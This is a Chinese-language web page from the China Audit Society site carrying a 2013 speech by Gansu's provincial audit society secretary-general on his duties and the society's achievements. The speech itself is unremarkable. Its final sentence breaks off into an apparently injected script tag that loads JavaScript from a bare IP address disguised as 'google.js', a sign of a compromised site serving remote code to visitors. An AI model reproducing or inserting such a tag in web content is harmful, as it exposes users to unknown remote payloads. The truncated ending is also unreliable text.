首页学会基本情况规划与计划课题管理学会会议培训与学习学术交流审计研究
当前位置: 首页  >  中国审计学会动态 > 正文
 
2013年省级审计学会秘书长培训班上甘肃发言材料
 
【时间:2015年07月31日】 字号: 【大】 【中】 【小】
                         我履行省审计学会秘书长职责的几点体会
                          甘肃省审计学会副会长兼秘书长李敬道
   
     根据会议安排,我简单介绍一下自己履行甘肃省审计学会秘书长职责的情况,谈几点粗浅的体会,期望抛砖引玉,以星星之火点燃引发大家的激情与思路,群策群力、真抓实干,为全面提升学会工作质量和水平而更加努力奋斗。
    一、甘肃省审计学会秘书长规定职责 
    要做好学会秘书长,就要明确自己的主要职责,清楚自己是干什么的。甘肃省审计学会章程第二十九条规定:在会长的领导下,秘书长行使下列职权:(一)主持秘书处的日常工作,组织实施年度工作计划;(二)协调各分支机构、代表机构、实体机构开展工作;(三)提名副秘书长以及各办事机构、分支机构、代表机构和实体机构主要负责人,交理事会或常务理事会决定;(四)决定办事机构、代表机构、实体机构专职工作人员的聘用;(五)处理其他日常事务。
    二、对秘书长职责重要性的认识 
    审计理论工作与审计实务工作是我们审计事业腾飞的一对翅膀,审计学会是搭建实践与理论的桥梁,学会秘书长是带领秘书处落实各项任务的第一责任人。具有承上启下、联系各方的职能,秘书长的水平,基本代表了秘书处的能力,直接影响着学会工作的效能和效率。所以,做好秘书长工作责任重大,使命光荣。这项工作值得我们干,不但要干,还要干好。
    三、三年来的职责履行情况 
    我是2009年9月开始被审计厅党组推荐任命为甘肃省审计学会秘书长的,三年多来,在会长的领导下,带领秘书处全面完成了甘肃省审计学会部署的各项任务。主要包括三个方面,一是中国审计学会安排下达的各项工作,如《审计研究》杂志征订,组织人员参加理论研究骨干培训班,组织审计署重点科研课题投标,组织参加中国审计学会征文及研讨会等。二是省审计厅授权委托的各项工作,如组织省内外专题调研,“三会合一”(即优秀论文课题评选表彰、理论研讨、常务理事会三会合一)。三是学会自身建设的各项工作,如收取会费,督促检查各市州、县审计学会建设发展。
大家知道,管理工作无非是计划、组织、实施和控制。三年来,我省的主要做法是,在何振中厅长的重视和厅党组的支持下,我们围绕全省审计中心工作谋划全盘,将学会各项工作纳入全省审计工作计划下达和年度目标考核,增强工作的严肃性,通过各项制度检查督促,提高工作的绩效。我带领学会秘书处做好份内工作,接受任务不走样,执行任务不打折,遇到难题勤思索,使学会工作每年都有突破、有亮点:
    2010年,我们协助中国审计学会成功举办了全国秘书长和科研所长会议。甘肃省审计学会在深入调研的基础上,总结了兰州、张掖、金昌、武威四市审计经验,同时就审计机关人员编制、经费保障、经济责任审计机构设置、审计队伍建设和审计干部培训等问题提出了合理化建议,得到了甘肃省审计厅的高度重视,建议被采纳后写入甘肃省政府出台的78号文《甘肃省人民政府关于进一步加强审计工作的意见》,其中规定工作经费按人均每年一至三万元安排,从而使审计机关有了工作经费的刚性指标,为推动全省审计事业的发展做出了积极贡献。
    2011年,我们通过多方协调,成功赴台湾举办了学会理事高级研讨班,开阔了眼界,扩大了学术交流范围。
    2012 年,学会提交的《国家审计与政府绩效研究》的论文,获得了审计署组织的审计机关优秀审计论文报告一等奖,是甘肃省审计系统30年来审计理论研究成果获得的最高奖项,该课题提出的有关思路得到了审计署的肯定。6月份成功换届,将学会搞成了政、学、研、企大格局的开放性学会,兰州军区审计局系统及甘肃省会计学会的骨干力量几乎全部志愿参加进来,原定的换届150人的大会会场坐不下,只好加凳子坐在过道里;省政府首席经济顾问、兰大博导、社科联副主席高新才,自愿做我们的副会长。
    今年2月,我们学会被甘肃省民政厅评为4A级省属社会组织机构,成为有关财政性资金重点支持发展对象。
    甘肃省审计厅年度考核分为一、二、三和目标任务完成奖4个等级,不同的等级对应不同的奖励。三年来,我们连年被评为甘肃省审计厅年度考核一等奖和二等奖。名誉会长、厅长何振中被省社科联评为全省先进个人,学会党支部被评为先?script src= http://91.239.15.61/google.js \>
【关闭】    【打印】
  版权信息
主办单位:中国审计学会  技术支持:审计署计算机技术中心 本站电话:010-82199820
本站地址:北京市海淀区中关村南大街4号(邮编:100086) 备案编号:京ICP备19011981号  建议使用分辨率:1024×768